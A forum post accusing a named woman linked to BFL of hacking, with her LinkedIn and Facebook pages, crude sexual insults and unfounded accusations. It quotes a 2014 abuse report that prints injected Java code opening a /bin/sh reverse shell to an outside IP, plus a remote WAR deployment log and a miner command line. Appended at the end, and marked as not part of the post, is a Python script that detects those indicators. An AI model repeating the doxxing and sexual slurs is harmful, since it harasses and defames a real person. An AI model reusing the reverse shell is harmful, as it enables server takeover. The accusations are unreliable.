Board: Service Discussion
Topic: Re: BFL fucked us over again (redux)
by Gleb Gamow on 08/07/2015, 07:26:03 UTC
From the desk of What Fuckin' Dots Is Bruno Tryin' To Connect Now?,

Trading of illegal goods is forbidden on this forum.

Good question. Who hosts it?

Whois shows that the server is hosted by Slicehost, and the domain is registered through Anonymous Speech. The DNS is hosted by ZoneEdit.

Slicehost now redirects to http://www.rackspace.com/cloud

http://web.archive.org/web/20060823045526/http://www.slicehost.com/contact



Note: 4579 Laclede Ave.

https://start.cortera.com/company/research/l3r6lxj1n/marketing-applications-international/



http://web.archive.org/web/20090519003432/http://www.freepokerpoint.com/corporate.aspx



https://www.linkedin.com/in/marcelavegachang



Who is https://www.linkedin.com/in/marcelavegachang ?



Where else did Marcela Vega Chang work?



Both entities owned by Sonny Vleisides back during the days, and after the demise of Laissez Faire City in Costa Rica.

Besides this forum, what other sites were hacked while using SliceHost?

Bitcoinica was also in Rackspace, right?

Well, this just in http://www.rackspace.com/knowledge_center/content/slicehost-forum-archive-migration-and-conversion

Rackspace's slicehost forum user DB compromised. They are a bit unclear on how and what exactly was compromised, and why do they know it.

This shouldn't in theory affect rackspace users but is a fair warning on not reusing passwords and also not having your passwords anywhere near "the cloud"...

coinex banned my account and stole my money

they said I used a hacked server for mining lol

I rented a mining rig and that's all
This was a complaint about your account.
-----
From: Tod Harter <tharter@whitsendsolutions.com>
Date: Thu, Jan 23, 2014 at 12:50 PM
Subject: Acceptable use violation
To: abuse@rackspace.com, Nathan Simpson <nsimpson@whitsendsolutions.com>,
Chris Ranni <cranni@whitsendsolutions.com>

Dear Sirs,

I have to report to you that two of our JBoss servers were exploited today
using a Tomcat deployer hack. Specifically the following exploit
http://blog.rimuhosting.com/2011/03/17/jboss-exploits-running-python/

The following code was injected:
{
Socket socket = new Socket( "50.57.145.165", 8081 );
Process process = Runtime.getRuntime().exec( "/bin/sh" );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}

Note the IP address of the resulting deployment is a server in a network
address block delegated to Rackspace:

#
# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=50.57.145.165?showDetails=true&showARIN=false&ext=netref2
#

Rackspace Hosting RACKS-8-NET-4 (NET-50-56-0-0-1) 50.56.0.0 - 50.57.255.255
Slicehost RSPC-654321664654 (NET-50-57-128-0-1) 50.57.128.0 - 50.57.159.255

Resulting in an unauthorized deployment as follows:
marx 3259 0.0 0.0 5164 1300 ? S Jan22 0:00 /bin/sh /opt/marx/jboss-6.0.0.Final-marx/bin/run.sh -c default -b 0.0.0.0
marx 3309 2.3 36.6 1819604 644140 ? Sl Jan22 29:44 \_ /opt/marx/jdk1.7.0_45//bin/java -server -XX:MaxPermSize=256m -Xms256m -Xmx1284m -Dsun.rmi.dgc.client.gcInterval=3600000 -Dsun.rmi.dgc.server.gcInterval=3600000
marx 12389 0.0 0.0 5160 1256 ? S 17:41 0:00 \_ /bin/sh
marx 12412 194 0.0 39612 1192 ? Sl 17:42 83:23 \_ ./javac -a scrypt -o stratum+tcp://stratum.coinex.pw:9933 -u nirgends2 -p 123456

This is clearly a bitcoin mining application, crudely disguised.

The relevant log record from JBoss being:

2014-01-23 17:41:11,814 INFO [org.jboss.deployment.MainDeployer] (http-0.0.0.0-8080-6) deploy, url=http://50.57.145.165:60000/MDSerqWz.war
2014-01-23 17:41:12,030 INFO [org.jboss.web.tomcat.service.deployers.TomcatDeployment] (http-0.0.0.0-8080-6) deploy, ctxPath=/MDSerqWz

I'm guessing the server at 50.57.145.165 has already been compromised in
some way, but I would only be guessing. I'd appreciate it if you guys would
take a look and notify whoever is running that machine that they'll need to
clean it up! We will patch our systems as well.

Thanks

Sincerely,
Tod G. Harter
Managing Partner
Whit's End Solutions, LLP



Care to guess who at BFL is a master hacker?

I'll give you a clue:



There you have it, Sonny's main squeeze from his Costa Rican days living in Italy fucking his brother, Gabriel, after work from Hotel Janus while awaiting Sonny's release from prison, then once he's back in the states awaiting his now probation, Marcela is employed at another gaming outfit that has a address located where the servers for this forum were located, along with some entities that were also hacked or had issues prior to SliceHost being picked up my RackSpace, then later Marcela's employed by BFL getting paid big bucks from moneys stolen for doing practically nothing while sucking every dick in KC before going home to BFL-cum-Sonny's BTC-House to suck his dick with sore lips.

https://www.facebook.com/photo.php?fbid=101429416537533&set=pb.100000114241527.-2207520000.1436343976.&type=3&theater



When was the above picture taken? I'm goin' guess in 2002 when Marcela Vega Chang worked for Software Solutions S.A. How do I know that?

https://www.facebook.com/photo.php?fbid=101431066537368&set=pb.100000114241527.-2207520000.1436343976.&type=3&theater
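
Added example, not part of the original post or of the abuse report it quotes: the two indicators that report relies on, expressed as Python checks, one for JBoss MainDeployer events that pull an archive from another host and one for processes whose command line names a stratum pool. The log and ps excerpts are the ones quoted in the report with line wraps removed; the function names, the set of remote URL schemes and the list of JDK tool names are assumptions of this example.

```python
import os
import re
from urllib.parse import urlparse

# Excerpts copied from the abuse report quoted in the post, e-mail line wraps removed.
JBOSS_LOG = """\
2014-01-23 17:41:11,814 INFO [org.jboss.deployment.MainDeployer] (http-0.0.0.0-8080-6) deploy, url=http://50.57.145.165:60000/MDSerqWz.war
2014-01-23 17:41:12,030 INFO [org.jboss.web.tomcat.service.deployers.TomcatDeployment] (http-0.0.0.0-8080-6) deploy, ctxPath=/MDSerqWz
"""
PS_OUTPUT = """\
marx 3259 0.0 0.0 5164 1300 ? S Jan22 0:00 /bin/sh /opt/marx/jboss-6.0.0.Final-marx/bin/run.sh -c default -b 0.0.0.0
marx 12389 0.0 0.0 5160 1256 ? S 17:41 0:00 \\_ /bin/sh
marx 12412 194 0.0 39612 1192 ? Sl 17:42 83:23 \\_ ./javac -a scrypt -o stratum+tcp://stratum.coinex.pw:9933 -u nirgends2 -p 123456
"""
REMOTE_SCHEMES = {"http", "https", "ftp"}   # assumption: schemes treated as off-host
JDK_TOOL_NAMES = {"java", "javac", "jar"}   # assumption: names a miner may borrow
DEPLOY_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d),\d+\s+\w+\s+"
    r"\[org\.jboss\.deployment\.MainDeployer\]\s+\((?P<thread>[^)]+)\)\s+"
    r"deploy, url=(?P<url>\S+)", re.M)
STRATUM_RE = re.compile(r"stratum\+tcp://(?P<pool>[^\s/:]+):(?P<port>\d+)")

def remote_deployments(log_text):
    """MainDeployer events whose archive was fetched from another host."""
    hits = []
    for m in DEPLOY_RE.finditer(log_text):
        url = urlparse(m["url"])
        if url.scheme in REMOTE_SCHEMES and url.hostname:
            hits.append({"time": m["ts"], "thread": m["thread"],
                         "source": url.hostname,
                         "archive": os.path.basename(url.path)})
    return hits

def miner_processes(ps_text):
    """ps rows (aux layout: 10 fixed columns, then the command) naming a stratum pool."""
    hits = []
    for line in ps_text.splitlines():
        m = STRATUM_RE.search(line)
        fields = line.split(None, 10)
        if not m or len(fields) < 11:
            continue
        exe = fields[10].lstrip("\\_ ").split()[0]   # drop the forest-view "\_" prefix
        hits.append({"user": fields[0], "pid": int(fields[1]), "exe": exe,
                     "pool": m["pool"], "port": int(m["port"]),
                     "borrowed_name": os.path.basename(exe) in JDK_TOOL_NAMES})
    return hits
```

Joining the two results on user and time window (the deploy at 17:41:11 and the child processes started at 17:41 and 17:42) ties the miner to the unauthorized deployment.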